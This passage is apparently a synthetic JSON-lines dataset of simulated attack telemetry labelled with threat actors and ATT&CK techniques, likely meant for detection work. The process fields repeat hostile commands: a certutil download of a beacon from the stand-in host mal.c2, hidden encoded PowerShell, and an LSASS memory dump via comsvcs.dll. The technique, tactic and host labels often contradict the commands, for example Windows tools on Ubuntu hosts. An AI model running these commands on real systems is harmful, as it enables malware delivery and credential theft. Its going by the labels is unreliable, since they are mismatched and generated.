Stable)","variation_seed":"19743UNC4841T1003.001"},"network":{"domain":"github.com","dst_ip":"1.41.180.216","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"certutil.exe","parent_name":"winlogon.exe"},"source":"Windows Security Log","timestamp":"2026-12-28T14:52:58.000Z","user":{"name":"azuread\\psrnl76o01ys","sid":"S-1-5-21-437045468-903892902-2309"}}
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1531 using fileless technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Lateral Movement","Persistence"],"technique_id":"T1531"},"event_id":"evt_unc4841_20250523T104919000Z_0019745","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["TLS","WMI","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.121.119.254","name":"AZURE-VM-H3G1J6SBQD","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19745UNC4841T1531"},"network":{"domain":"update.microsoft.com","dst_ip":"1.173.225.45","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"mshta.exe","parent_name":"services.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-06-02T07:48:37.000Z","user":{"name":"i-mhxiednqjepz","sid":"S-1-5-21-467662119-789712079-1816"}}
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1021.006 using fileless technique.","sub_technique":"Windows Remote Management","tactic":["Reconnaissance"],"technique_id":"T1021.006"},"event_id":"evt_apt29_20260610T010302000Z_0019747","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["TLS","LOLBin","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.204.23.140","name":"DB-ORACLE-NX0H2GT2MW","os":"Windows 11"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19747APT29T1021.006"},"network":{"domain":"aws.amazon.com","dst_ip":"1.161.70.209","dst_port":443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1312 C:\\temp\\lsass.dmp full","name":"cmstp.exe","parent_name":"services.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-05-30T12:14:38.000Z","user":{"name":"arn:aws:iam::wtpyvbylpf4l","sid":"S-1-5-21-291104217-642047063-5670"}}
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1546.003 using fileless technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Reconnaissance"],"technique_id":"T1546.003"},"event_id":"evt_unc4841_20250812T120433000Z_0019749","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["LOLBin","TLS","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.80.129.4","name":"DB-ORACLE-79T26WQVGV","os":"Ubuntu 22.04"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19749UNC4841T1546.003"},"network":{"domain":"github.com","dst_ip":"1.148.176.73","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"wmic.exe","parent_name":"services.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-05-05T07:00:42.000Z","user":{"name":"CORP\\u7fuu8odc5gu","sid":"S-1-5-21-795532815-636563412-5774"}}
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1059.001 using fileless technique.","sub_technique":"PowerShell","tactic":["Initial Access","Command and Control","Lateral Movement"],"technique_id":"T1059.001"},"event_id":"evt_apt29_20250812T200942000Z_0019751","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["WMI","TLS","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.15.173.149","name":"DB-ORACLE-RLKGREF8SJ","os":"Windows 11"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19751APT29T1059.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.136.19.85","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"powershell.exe","parent_name":"explorer.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-12-30T22:12:03.000Z","user":{"name":"arn:aws:iam::jvuryn4ld4ss","sid":"S-1-5-21-998164309-284709577-8269"}}
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1059.001 using LOLBin technique.","sub_technique":"PowerShell","tactic":["Credential Access"],"technique_id":"T1059.001"},"event_id":"evt_unc4841_20250101T062854000Z_0019753","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["TLS","LOLBin","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.150.208.9","name":"EC2-INST-YSN2T3OASY","os":"Windows Server 2022"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19753UNC4841T1059.001"},"network":{"domain":"github.com","dst_ip":"1.71.105.142","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"wmic.exe","parent_name":"svchost.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-05-18T14:14:57.000Z","user":{"name":"svc_9sy89bo4d3a8","sid":"S-1-5-21-324737684-831390884-4754"}}
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1566.001 using encrypted C2 technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Persistence","Discovery","Exfiltration"],"technique_id":"T1566.001"},"event_id":"evt_fin7_20250417T003018000Z_0019755","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["Fileless","WMI","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.35.237.203","name":"APP-WEB-538YEFN00M","os":"Ubuntu 22.04"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19755FIN7T1566.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.154.148.200","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"cmstp.exe","parent_name":"winlogon.exe"},"source":"Windows Security Log","timestamp":"2025-02-08T22:37:31.000Z","user":{"name":"CORP\\58pzhrbvku28","sid":"S-1-5-21-320461719-867485379-3357"}}
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1021.006 using cloud-native technique.","sub_technique":"Windows Remote Management","tactic":["Defense Evasion"],"technique_id":"T1021.006"},"event_id":"evt_apt41_20250916T041024000Z_0019757","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["Fileless","Base64","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.116.117.97","name":"WIN-FIN-SRV-F0UJBF093J","os":"Windows Server 2022"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19757APT41T1021.006"},"network":{"domain":"aws.amazon.com","dst_ip":"1.20.173.129","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"rundll32.exe","parent_name":"svchost.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-04-22T20:05:56.000Z","user":{"name":"arn:aws:iam::0pyo4gw48qos","sid":"S-1-5-21-711975470-930047661-2233"}}
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1546.003 using LOLBin technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Impact","Command and Control","Privilege Escalation"],"technique_id":"T1546.003"},"event_id":"evt_mustangpanda_20261211T032706000Z_0019759","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["Fileless","Base64","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.157.249.93","name":"DB-ORACLE-E8YC82Y3DH","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19759Mustang PandaT1546.003"},"network":{"domain":"github.com","dst_ip":"1.153.62.224","dst_port":8443,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"certutil.exe","parent_name":"svchost.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-07-30T20:19:27.000Z","user":{"name":"azuread\\422z08qp3ssm","sid":"S-1-5-21-813554110-664159456-4320"}}
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1531 using LOLBin technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Collection","Discovery"],"technique_id":"T1531"},"event_id":"evt_volttyphoon_20250123T211356000Z_0019761","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["Fileless","JA3 Spoof","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.49.6.110","name":"APP-WEB-2UQVV3EKSM","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19761Volt TyphoonT1531"},"network":{"domain":"update.microsoft.com","dst_ip":"1.43.203.49","dst_port":8443,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2681 C:\\temp\\lsass.dmp full","name":"cmstp.exe","parent_name":"svchost.exe"},"source":"Windows Security Log","timestamp":"2026-08-01T11:37:10.000Z","user":{"name":"azuread\\cihb4rah78vb","sid":"S-1-5-21-266959498-875581918-2160"}}
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1566.001 using cloud-native technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Discovery"],"technique_id":"T1566.001"},"event_id":"evt_fin7_20260109T233338000Z_0019763","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["Fileless","Base64","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.169.150.236","name":"WIN-FIN-SRV-E4NMF2AA8Z","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19763FIN7T1566.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.141.152.40","dst_port":8443,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"powershell.exe","parent_name":"services.exe"},"source":"Windows Security Log","timestamp":"2026-11-15T08:59:00.000Z","user":{"name":"azuread\\lic1xnl3ygb0","sid":"S-1-5-21-860845367-785224518-3752"}}
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1098.004 using encrypted C2 technique.","sub_technique":"SSH Authorized Keys","tactic":["Reconnaissance","Lateral Movement"],"technique_id":"T1098.004"},"event_id":"evt_volttyphoon_20260902T015420000Z_0019765","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","TLS","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.210.22.50","name":"APP-WEB-CR4ZJKACY2","os":"Windows 11"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19765Volt TyphoonT1098.004"},"network":{"domain":"update.microsoft.com","dst_ip":"1.134.144.79","dst_port":445,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"cmstp.exe","parent_name":"services.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-02-24T11:10:18.000Z","user":{"name":"i-jnoioximkqc4","sid":"S-1-5-21-823458730-152626891-7407"}}
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1531 using cloud-native technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Credential Access"],"technique_id":"T1531"},"event_id":"evt_apt29_20261228T191134000Z_0019767","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["Fileless","JA3 Spoof","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.58.162.88","name":"WIN-FIN-SRV-BUGAYGZZX9","os":"Amazon Linux 2"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19767APT29T1531"},"network":{"domain":"aws.amazon.com","dst_ip":"1.85.93.213","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"cmstp.exe","parent_name":"explorer.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-01-27T11:05:35.000Z","user":{"name":"arn:aws:iam::mz49nahmj751","sid":"S-1-5-21-494877739-435823914-1637"}}
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1098.004 using LOLBin technique.","sub_technique":"SSH Authorized Keys","tactic":["Credential Access","Impact"],"technique_id":"T1098.004"},"event_id":"evt_apt41_20250422T173231000Z_0019769","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["LOLBin","Fileless","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.1.85.190","name":"IAM-ROLE-HPH4BFLJ09","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19769APT41T1098.004"},"network":{"domain":"aws.amazon.com","dst_ip":"1.3.4.5","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2608 C:\\temp\\lsass.dmp full","name":"rundll32.exe","parent_name":"services.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-12-11T05:45:56.000Z","user":{"name":"CORP\\g4u6fbmqxfco","sid":"S-1-5-21-305761972-834353460-8244"}}
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1546.003 using LOLBin technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Discovery","Initial Access","Execution"],"technique_id":"T1546.003"},"event_id":"evt_mustangpanda_20260619T222621000Z_0019771","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["LOLBin","Base64","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.234.106.48","name":"IAM-ROLE-9ZKTEZ1J6H","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19771Mustang PandaT1546.003"},"network":{"domain":"update.microsoft.com","dst_ip":"1.14.62.30","dst_port":3389,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"mshta.exe","parent_name":"winlogon.exe"},"source":"Windows Security Log","timestamp":"2026-11-19T15:47:10.000Z","user":{"name":"svc_9ztqf69fw76i","sid":"S-1-5-21-615102135-672533676-3383"}}
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1021.006 using LOLBin technique.","sub_technique":"Windows Remote Management","tactic":["Exfiltration"],"technique_id":"T1021.006"},"event_id":"evt_fin7_20261029T120218000Z_0019773","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["LOLBin","Fileless","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.252.130.44","name":"DB-ORACLE-EHTIYU8UB5","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19773FIN7T1021.006"},"network":{"domain":"aws.amazon.com","dst_ip":"1.137.215.211","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1690 C:\\temp\\lsass.dmp full","name":"mshta.exe","parent_name":"winlogon.exe"},"source":"Windows Security Log","timestamp":"2025-10-03T23:36:47.000Z","user":{"name":"i-rfi2jctki1u2","sid":"S-1-5-21-912931567-485167417-3043"}}
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1003.001 using cloud-native technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Command and Control"],"technique_id":"T1003.001"},"event_id":"evt_mustangpanda_20260421T092351000Z_0019775","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","Base64","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.65.7.67","name":"IAM-ROLE-MZKQTYJBCH","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19775Mustang PandaT1003.001"},"network":{"domain":"github.com","dst_ip":"1.31.213.244","dst_port":3389,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"bitsadmin.exe","parent_name":"explorer.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-03-06T01:16:42.000Z","user":{"name":"azuread\\2tnbeu33fcqw","sid":"S-1-5-21-179996687-312439128-8003"}}
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1531 using fileless technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Exfiltration"],"technique_id":"T1531"},"event_id":"evt_fin7_20250627T114133000Z_0019777","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["Base64","Fileless","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.12.188.153","name":"WIN-FIN-SRV-CX4PXCQHPS","os":"Amazon Linux 2"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19777FIN7T1531"},"network":{"domain":"github.com","dst_ip":"1.3.253.116","dst_port":3389,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"powershell.exe","parent_name":"explorer.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-06-04T14:34:25.000Z","user":{"name":"i-b2oeing1pzl6","sid":"S-1-5-21-877404514-106548961-9690"}}
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1484.001 using encrypted C2 technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Reconnaissance","Execution"],"technique_id":"T1484.001"},"event_id":"evt_apt41_20250904T093938000Z_0019779","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["Base64","JA3 Spoof","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.249.15.57","name":"APP-WEB-VO7C3J3A2N","os":"Windows 11"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19779APT41T1484.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.91.191.114","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"cmstp.exe","parent_name":"services.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-05-15T21:09:54.000Z","user":{"name":"arn:aws:iam::zcvibdkgbj05","sid":"S-1-5-21-591875013-306081558-7200"}}
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1021.006 using LOLBin technique.","sub_technique":"Windows Remote Management","tactic":["Lateral Movement"],"technique_id":"T1021.006"},"event_id":"evt_apt41_20251005T171555000Z_0019781","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["TLS","Base64","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.48.52.70","name":"DB-ORACLE-I2WEJQV4HO","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19781APT41T1021.006"},"network":{"domain":"aws.amazon.com","dst_ip":"1.85.53.2","dst_port":445,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2801 C:\\temp\\lsass.dmp full","name":"certutil.exe","parent_name":"explorer.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-12-23T16:19:28.000Z","user":{"name":"azuread\\wrhvy4qmistw","sid":"S-1-5-21-979168418-873765717-3327"}}
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1098.004 using encrypted C2 technique.","sub_technique":"SSH Authorized Keys","tactic":["Persistence","Defense Evasion"],"technique_id":"T1098.004"},"event_id":"evt_apt41_20250422T200530000Z_0019783","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["TLS","Fileless","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.16.255.139","name":"WIN-FIN-SRV-INZYQT2WZ8","os":"Windows Server 2022"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19783APT41T1098.004"},"network":{"domain":"update.microsoft.com","dst_ip":"1.70.212.207","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"bitsadmin.exe","parent_name":"services.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-03-02T12:24:38.000Z","user":{"name":"i-03w5d33hr13i","sid":"S-1-5-21-921131267-322556771-2484"}}
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1003.001 using encrypted C2 technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Discovery"],"technique_id":"T1003.001"},"event_id":"evt_scatteredspider_20260107T020033000Z_0019785","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["Fileless","JA3 Spoof","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.132.121.98","name":"AZURE-VM-7J9IP8CYCJ","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19785Scattered SpiderT1003.001"},"network":{"domain":"github.com","dst_ip":"1.152.213.111","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"mshta.exe","parent_name":"svchost.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-10-27T05:30:28.000Z","user":{"name":"arn:aws:iam::z8aviwhbgmuv","sid":"S-1-5-21-451907154-674876848-8192"}}
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1566.001 using fileless technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Defense Evasion","Privilege Escalation","Execution"],"technique_id":"T1566.001"},"event_id":"evt_apt29_20260515T004252000Z_0019787","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["LOLBin","JA3 Spoof","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.191.48.9","name":"AZURE-VM-D1WWXK588V","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19787APT29T1566.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.1.192.162","dst_port":3389,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"mshta.exe","parent_name":"winlogon.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-10-04T22:05:12.000Z","user":{"name":"azuread\\e7b1m42ev2vu","sid":"S-1-5-21-317002065-595344271-4147"}}
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1546.003 using LOLBin technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Lateral Movement","Reconnaissance","Initial Access"],"technique_id":"T1546.003"},"event_id":"evt_apt29_20261201T104515000Z_0019789","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["LOLBin","Fileless","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.230.16.119","name":"APP-WEB-E49AEPUJX5","os":"Ubuntu 22.04"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19789APT29T1546.003"},"network":{"domain":"cdn-content.com","dst_ip":"1.170.189.108","dst_port":3389,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"powershell.exe","parent_name":"services.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-01-22T12:23:56.000Z","user":{"name":"svc_rny1ztozaid6","sid":"S-1-5-21-810562557-797513964-6599"}}
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1484.001 using encrypted C2 technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Defense Evasion","Execution"],"technique_id":"T1484.001"},"event_id":"evt_apt29_20251002T131008000Z_0019791","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["LOLBin","WMI","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.230.252.229","name":"AZURE-VM-HUDR1R08QM","os":"Windows 11"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & 